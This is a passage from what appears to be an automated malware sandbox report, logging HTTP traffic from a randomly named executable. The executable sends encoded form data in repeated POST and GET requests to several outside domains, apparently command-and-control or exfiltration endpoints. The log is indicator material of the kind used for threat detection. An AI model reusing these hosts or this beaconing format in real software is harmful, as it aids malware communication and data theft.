                                                        Jan 16, 2025 00:44:58.924982071 CET306INHTTP/1.1 404 Not Found
                                                        Content-Length: 146
                                                        Content-Type: text/html
                                                        Date: Wed, 15 Jan 2025 23:44:58 GMT
                                                        Server: nginx
                                                        X-Cache: BYPASS
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.650010134.122.133.80804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:45:00.629848003 CET789OUTPOST /jpjz/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.jrcov55qgcxp5fwa.top
                                                        Origin: http://www.jrcov55qgcxp5fwa.top
                                                        Cache-Control: max-age=0
                                                        Content-Length: 233
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 4d 75 71 68 35 56 50 4c 50 74 43 4d 6d 42 6e 66 42 5a 6b 74 69 65 39 74 61 54 34 77 7a 58 6c 71 54 44 6f 32 33 58 68 57 2f 6d 35 78 36 38 58 6d 7a 51 4f 77 6d 55 4f 50 74 6a 31 52 52 31 72 4b 77 69 6b 4b 6f 51 5a 4b 4a 6f 4b 57 78 50 7a 59 6a 72 2f 53 65 43 57 69 46 37 7a 56 57 44 32 47 6a 70 32 71 69 54 37 56 6d 47 53 54 52 2b 6d 52 76 53 79 64 49 75 57 64 48 7a 64 72 55 70 42 4e 4f 4e 61 4c 34 4f 5a 35 48 6a 54 50 6a 31 6e 4a 79 61 53 65 65 4a 36 7a 72 71 59 50 54 2f 2b 47 73 55 30 6f 73 4d 6a 39 76 35 31 48 78 7a 63 5a 55 6c 4c 72 38 50 78 6a 5a 47 37 78 31 48 6d 34 46 71 50 61 34 43 76 38 4b 52 6f 41 31 36 4a 33 34 7a 65 49 56 78 4b 36 52 50 74 65 58 63 35 68 4f 77 3d 3d
                                                        Data Ascii: fVnx=Muqh5VPLPtCMmBnfBZktie9taT4wzXlqTDo23XhW/m5x68XmzQOwmUOPtj1RR1rKwikKoQZKJoKWxPzYjr/SeCWiF7zVWD2Gjp2qiT7VmGSTR+mRvSydIuWdHzdrUpBNONaL4OZ5HjTPj1nJyaSeeJ6zrqYPT/+GsU0osMj9v51HxzcZUlLr8PxjZG7x1Hm4FqPa4Cv8KRoA16J34zeIVxK6RPteXc5hOw==
                                                        Jan 16, 2025 00:45:01.501584053 CET306INHTTP/1.1 404 Not Found
                                                        Content-Length: 146
                                                        Content-Type: text/html
                                                        Date: Wed, 15 Jan 2025 23:45:01 GMT
                                                        Server: nginx
                                                        X-Cache: BYPASS
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.650011134.122.133.80804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:45:03.298104048 CET1802OUTPOST /jpjz/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.jrcov55qgcxp5fwa.top
                                                        Origin: http://www.jrcov55qgcxp5fwa.top
                                                        Cache-Control: max-age=0
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 4d 75 71 68 35 56 50 4c 50 74 43 4d 6d 42 6e 66 42 5a 6b 74 69 65 39 74 61 54 34 77 7a 58 6c 71 54 44 6f 32 33 58 68 57 2f 6d 78 78 37 4f 76 6d 79 33 61 77 67 6b 4f 50 6c 44 31 4d 52 31 72 4c 77 69 63 52 6f 51 6c 30 4a 74 4f 57 77 75 54 59 30 4b 2f 53 51 43 57 69 4e 62 7a 57 59 6a 32 54 6a 70 6d 6d 69 54 72 56 6d 47 53 54 52 38 2b 52 74 41 61 64 4f 75 57 65 47 7a 64 6e 43 5a 42 70 4f 4e 7a 77 34 4f 55 4f 48 51 72 50 67 56 33 4a 30 6f 36 65 57 4a 36 78 6d 4b 59 48 54 2f 79 6a 73 55 42 58 73 50 2f 62 76 35 52 48 38 45 78 34 4a 6c 66 57 67 64 39 44 43 32 66 33 37 51 65 5a 63 72 54 79 75 52 58 70 41 6a 6b 57 35 65 45 68 72 77 4f 4d 63 51 4b 70 66 36 46 50 64 2b 6f 4b 58 53 41 2f 72 54 73 4c 49 6a 74 2b 71 2f 31 44 46 4a 54 69 6f 53 57 47 57 63 30 77 63 71 43 54 76 47 6b 79 58 44 37 4c 52 45 4a 2b 35 37 4f 35 44 36 75 4c 4a 63 2b 35 43 71 44 42 71 73 67 70 67 2b 4a 37 59 51 50 61 50 72 71 69 53 6c 4f 4e 43 31 55 71 4f 41 42 59 53 44 6a 6d 6b 53 62 79 2f 6f 33 36 47 34 41 4e 50 76 47 64 6e [TRUNCATED]
                                                        Data Ascii: fVnx=Muqh5VPLPtCMmBnfBZktie9taT4wzXlqTDo23XhW/mxx7Ovmy3awgkOPlD1MR1rLwicRoQl0JtOWwuTY0K/SQCWiNbzWYj2TjpmmiTrVmGSTR8+RtAadOuWeGzdnCZBpONzw4OUOHQrPgV3J0o6eWJ6xmKYHT/yjsUBXsP/bv5RH8Ex4JlfWgd9DC2f37QeZcrTyuRXpAjkW5eEhrwOMcQKpf6FPd+oKXSA/rTsLIjt+q/1DFJTioSWGWc0wcqCTvGkyXD7LREJ+57O5D6uLJc+5CqDBqsgpg+J7YQPaPrqiSlONC1UqOABYSDjmkSby/o36G4ANPvGdnUINNNj57u8wStrWUvr9S3X092vXO53adxMbyiqOrrO1Y3n2I798S9eDCe7Z2ehlo9EGWIUbi425uQ4v5WengHp9W2bwp8sWpfBD/BLA27MqYnUhziPAN6SxebeMAQDJ4Yyi15hOomyP2EZf7kZ9qV1nxE9oQtHeHbHS9CQeEwlRAbBDTO7npzAtfSc2Y+HfkamU7ZmFQ0rFuIGRpPVQQ9Pru37Xr+VrS2pJi4y2QKdMV+9DfR7vuPcL+sJAXW0NQhObKaDsFkvR7G+QhQXITPzv/qPU11h+psUR67yWjcbBk2olzhxXbnDHbsavmeFo0lvUHGu2hMCGvYUGANS8AF+4BJ2beg0+3IhjbqPVjPgHUFdbzAaMNqhcdsBwOZzmfM7GoWLAdwgQeBoYnXbXrWxNbolu7sVEHhycpkz4EOyK/ZA4s+Zi+ALRgKIu2ipRrIN+I+KgDr4dm+J1bQE09SN+vwY/rsoS73vSzEM5w4hhOutRbwCA56MPra+INFUq4KqfrkIFn5rPOA7OV9xvqyhrfOk4MBfkKM/5X79YJI64k8qDRyspyOUvcbvdudrW+K2MNlKfhqFFDe51HRnhzX5EEHePfR/66GwqfzwfVnzW/wo6cThW8XTnmawiQN8Bfn3nqRQGtUwttasYX2VMQs6oqtU7NkonWxe [TRUNCATED]
                                                        Jan 16, 2025 00:45:04.195646048 CET306INHTTP/1.1 404 Not Found
                                                        Content-Length: 146
                                                        Content-Type: text/html
                                                        Date: Wed, 15 Jan 2025 23:45:04 GMT
                                                        Server: nginx
                                                        X-Cache: BYPASS
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.650012134.122.133.80804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:45:05.852617025 CET492OUTGET /jpjz/?fVnx=BsCB6j6XIP/wuAb0HPY9posnISoRnnooDDFnz1MrtzBPzJTq92en/EOyrjYaLx3w2H4L+FlVDICDydTs7KXcbnKqUdTRdEmAj6qp0S6DrV+QINeL9xy6H8KuIEkcUIhaI8bz/+o=&XLc=1bXtqxM HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Host: www.jrcov55qgcxp5fwa.top
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Jan 16, 2025 00:45:06.742624044 CET306INHTTP/1.1 404 Not Found
                                                        Content-Length: 146
                                                        Content-Type: text/html
                                                        Date: Wed, 15 Jan 2025 23:45:06 GMT
                                                        Server: nginx
                                                        X-Cache: BYPASS
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.65001347.83.1.90804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:45:11.795666933 CET738OUTPOST /ctdy/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.adadev.info
                                                        Origin: http://www.adadev.info
                                                        Cache-Control: max-age=0
                                                        Content-Length: 209
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.adadev.info/ctdy/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 30 61 6e 71 6a 69 36 67 51 54 37 79 4c 30 76 4c 7a 51 4e 4d 74 49 65 4e 79 2b 6f 49 4b 58 5a 53 6d 48 63 2b 49 6a 57 39 4c 4f 7a 42 51 38 61 4c 55 31 38 49 48 71 78 67 51 4c 69 6b 54 6c 4b 31 43 32 31 45 74 46 71 63 6f 67 6f 67 51 51 57 43 47 69 51 37 50 52 30 53 31 32 6f 7a 36 30 2f 74 39 4a 39 32 48 2b 65 48 45 46 68 30 6e 49 45 6a 36 4f 4c 70 4e 64 2f 30 43 66 48 31 50 6a 43 36 66 44 41 4b 4f 42 5a 35 78 4d 6a 62 33 74 44 31 37 56 57 5a 77 75 71 30 34 45 52 55 48 70 78 2b 4a 75 67 78 70 74 6e 46 36 57 38 53 53 4e 46 39 76 72 78 43 7a 66 66 76 4b 33 66 42 61 4e 56 6a 6d 57 4d 6e 72 47 6a 56 6a 64 50 61
                                                        Data Ascii: fVnx=0anqji6gQT7yL0vLzQNMtIeNy+oIKXZSmHc+IjW9LOzBQ8aLU18IHqxgQLikTlK1C21EtFqcogogQQWCGiQ7PR0S12oz60/t9J92H+eHEFh0nIEj6OLpNd/0CfH1PjC6fDAKOBZ5xMjb3tD17VWZwuq04ERUHpx+JugxptnF6W8SSNF9vrxCzffvK3fBaNVjmWMnrGjVjdPa


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.65001447.83.1.90804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:45:14.395318031 CET762OUTPOST /ctdy/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.adadev.info
                                                        Origin: http://www.adadev.info
                                                        Cache-Control: max-age=0
                                                        Content-Length: 233
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.adadev.info/ctdy/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 30 61 6e 71 6a 69 36 67 51 54 37 79 5a 46 66 4c 2f 58 5a 4d 76 6f 65 4d 73 75 6f 49 54 48 5a 65 6d 48 51 2b 49 6d 32 54 4c 38 58 42 54 64 71 4c 56 30 38 49 45 71 78 67 59 72 69 6c 4e 56 4b 36 43 78 38 6e 74 45 57 63 6f 67 73 67 51 52 6d 43 47 54 51 38 4f 42 30 51 38 57 6f 78 6e 6b 2f 74 39 4a 39 32 48 2b 4c 69 45 46 70 30 6d 37 73 6a 36 76 4c 75 4f 64 2f 7a 53 50 48 31 59 7a 43 45 66 44 41 34 4f 45 6b 69 78 4f 72 62 33 73 7a 31 36 45 57 65 36 75 71 32 6c 30 51 49 58 4a 51 72 49 5a 42 68 33 65 37 63 6b 30 34 56 65 62 59 6e 7a 59 78 68 68 50 2f 74 4b 31 48 7a 61 74 56 4a 6b 57 30 6e 35 52 76 79 73 70 71 35 35 2b 6d 39 43 68 75 56 41 70 41 32 6c 76 58 73 38 69 73 6e 47 51 3d 3d
                                                        Data Ascii: fVnx=0anqji6gQT7yZFfL/XZMvoeMsuoITHZemHQ+Im2TL8XBTdqLV08IEqxgYrilNVK6Cx8ntEWcogsgQRmCGTQ8OB0Q8Woxnk/t9J92H+LiEFp0m7sj6vLuOd/zSPH1YzCEfDA4OEkixOrb3sz16EWe6uq2l0QIXJQrIZBh3e7ck04VebYnzYxhhP/tK1HzatVJkW0n5Rvyspq55+m9ChuVApA2lvXs8isnGQ==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.65001547.83.1.90804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:45:17.050340891 CET1775OUTPOST /ctdy/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.adadev.info
                                                        Origin: http://www.adadev.info
                                                        Cache-Control: max-age=0
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.adadev.info/ctdy/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 30 61 6e 71 6a 69 36 67 51 54 37 79 5a 46 66 4c 2f 58 5a 4d 76 6f 65 4d 73 75 6f 49 54 48 5a 65 6d 48 51 2b 49 6d 32 54 4c 38 66 42 54 75 79 4c 55 58 6b 49 46 71 78 67 62 72 69 6f 4e 56 4b 6a 43 33 55 37 74 45 61 6d 6f 6a 59 67 66 54 65 43 41 6e 38 38 48 42 30 51 2b 57 6f 77 36 30 2f 34 39 4a 74 36 48 2b 62 69 45 46 70 30 6d 2b 6f 6a 38 2b 4c 75 49 64 2f 30 43 66 48 51 50 6a 43 2f 66 44 6f 6f 4f 46 30 79 79 2f 4c 62 32 4d 6a 31 35 32 75 65 79 75 71 77 31 6b 51 41 58 4a 64 37 49 59 70 74 33 64 6e 69 6b 30 38 56 63 39 42 75 70 4b 38 2b 6a 2f 37 55 53 46 76 4e 55 4b 4e 68 73 67 77 32 31 43 44 4e 6f 4c 71 57 2f 36 37 6c 42 67 32 56 4b 61 74 57 72 34 79 73 38 6d 68 52 46 39 4f 5a 2b 4d 2f 51 38 59 51 6c 32 50 31 6e 73 46 57 78 55 6d 4b 31 35 32 75 38 52 41 5a 6c 38 50 4e 67 76 66 4c 66 41 76 73 47 31 4e 42 6b 69 49 48 66 35 2f 4d 6c 56 33 68 31 76 4d 6e 38 6b 49 55 67 48 61 39 4c 34 74 2b 4b 71 48 6a 4f 32 30 45 54 6f 31 61 59 39 46 58 44 43 42 7a 38 36 7a 6b 79 70 79 50 53 6e 42 37 64 30 [TRUNCATED]
                                                        Data Ascii: fVnx=0anqji6gQT7yZFfL/XZMvoeMsuoITHZemHQ+Im2TL8fBTuyLUXkIFqxgbrioNVKjC3U7tEamojYgfTeCAn88HB0Q+Wow60/49Jt6H+biEFp0m+oj8+LuId/0CfHQPjC/fDooOF0yy/Lb2Mj152ueyuqw1kQAXJd7IYpt3dnik08Vc9BupK8+j/7USFvNUKNhsgw21CDNoLqW/67lBg2VKatWr4ys8mhRF9OZ+M/Q8YQl2P1nsFWxUmK152u8RAZl8PNgvfLfAvsG1NBkiIHf5/MlV3h1vMn8kIUgHa9L4t+KqHjO20ETo1aY9FXDCBz86zkypyPSnB7d01OWgabMXVzvYkCNFcwc99wim31WkXGahOfWiqeAek2DSZllDdpbOg2k5Pr4ADlZMYX7Oc+NxiZOFdH1Po5d0Pd8c3G1n71S6pIC4y4pDMgBGFWGKLn6aTRpn7OWvfLhfvCxJFRsOIizfC8ruxw8BQfbwopWyeni4ZLBAdcbC05oGDBZ4M4uErE9WGXf6Bx/W/LnwrRs2zWDt4Q28QyK1ycMyDJD7YWOUyFnCCpQSyo+VVJ3kx24oJGn3xeNq4lyPOqMBZiLp1BR+DppTndiCRR68Adbr4iN7wRmxdIfpATKFzyvtalAI4DdgfdllTpElmZ5SshmeyW/0v2BpnpB9hFnzly+9cNu5bpMUDbLMjmysOuAdY0GF7Ekswgq59WbdF9auA9hvdm2DvBGXxnegxWmB5efAXFiNy00njmuDfVSBC2qxU036TTNYN4NMxH/my/dxKlGR5raQh6jeIcoyQnJD67Dw9ORP8oYfKcFbbaV77F7VtBnbV7Bp5sYb2nbzXqEh/pXh8NLJcotVlBSq1lkOGwbh1nD0mhkWWcLl6Vl7USyMl+/xkpWpQYC4z7m8bgk/DCqYKzUxxOLvPxS9mefLFuGCsnj0rKU22PjKQEFRQU0EDrxpqxypsJAj944irZk1b2dGbdLdwSzPMLYbB0MFMN0i0NWVbV [TRUNCATED]
                                                        Jan 16, 2025 00:45:18.435184956 CET137INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 15 Jan 2025 23:45:18 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.65001647.83.1.90804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:45:19.598169088 CET483OUTGET /ctdy/?fVnx=5YPKgWGFQCLPNGrLxhxItoeNmOBaThMtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZL0slqAhO+jziob4VAcWGL05V4I5mluLEA+jVEoKfPxy0XA8CH1k=&XLc=1bXtqxM HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Host: www.adadev.info
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Jan 16, 2025 00:45:21.205452919 CET139INHTTP/1.1 567 unknown
                                                        Server: nginx/1.18.0
                                                        Date: Wed, 15 Jan 2025 23:45:21 GMT
                                                        Content-Length: 17
                                                        Connection: close
                                                        Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                        Data Ascii: Request too large


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.650018188.114.97.3804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:45:26.418716908 CET741OUTPOST /8rr3/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.cifasnc.info
                                                        Origin: http://www.cifasnc.info
                                                        Cache-Control: max-age=0
                                                        Content-Length: 209
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.cifasnc.info/8rr3/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 76 4c 55 42 6c 6d 50 52 4b 6b 32 62 79 65 46 2f 71 67 46 34 34 76 6f 43 50 52 63 52 77 65 32 69 56 65 70 64 6c 52 2f 5a 76 52 74 61 54 55 34 38 6d 64 65 73 35 4b 6b 4a 4a 53 69 69 59 4b 33 56 70 4c 76 68 42 57 48 70 65 57 2f 77 66 6e 56 71 41 39 6f 57 2b 32 58 35 4a 30 62 59 34 4d 2f 30 56 56 50 70 6f 43 31 6e 36 34 50 6e 44 57 34 77 66 4d 43 66 69 6e 63 30 42 57 6f 66 66 51 72 69 6c 4b 65 4f 62 2b 2b 72 75 76 59 71 65 79 37 50 56 59 31 52 73 5a 64 6c 6e 4e 79 6f 58 38 39 47 69 54 71 7a 6f 75 34 56 6c 4a 4f 71 4c 7a 72 74 30 32 7a 65 33 6c 4e 64 64 71 6f 4a 73 70 5a 56 41 51 51 46 5a 4a 76 54 38 7a 72 6b
                                                        Data Ascii: fVnx=vLUBlmPRKk2byeF/qgF44voCPRcRwe2iVepdlR/ZvRtaTU48mdes5KkJJSiiYK3VpLvhBWHpeW/wfnVqA9oW+2X5J0bY4M/0VVPpoC1n64PnDW4wfMCfinc0BWoffQrilKeOb++ruvYqey7PVY1RsZdlnNyoX89GiTqzou4VlJOqLzrt02ze3lNddqoJspZVAQQFZJvT8zrk
                                                        Jan 16, 2025 00:45:27.005389929 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Wed, 15 Jan 2025 23:45:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        x-pingback: http://cifasnc.info/xmlrpc.php
                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                        last-modified: Wed, 15 Jan 2025 23:45:26 GMT
                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        vary: Accept-Encoding,User-Agent
                                                        x-turbo-charged-by: LiteSpeed
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T3ODdrmEbp6f%2BspjCzl3X4%2Bys0Sej6h6XmiebDMCONK13UdkFRmxkGF7pmDiWoXyDLSTjs18vKWrEiiciJEME%2Fr3xkz10kFsBz5totsCVJ0vbDmMttyLF3OQ3YMh0Nkovh8H"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9029bd4e8e3ed6bf-IAD
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=6903&min_rtt=6903&rtt_var=3451&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=741&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 dd 6f dc 36 0c 7f ce 01 f9 1f 58 0d c8 b5 d8 7c 4e fa b1 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec 8f 1f 24 f9 f3 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48
                                                        Data Ascii: 51eWo6X|NKAgYR$.$zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H
                                                        Jan 16, 2025 00:45:27.005412102 CET1157INData Raw: 38 13 b7 a0 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68 e2 5b 54 68 63
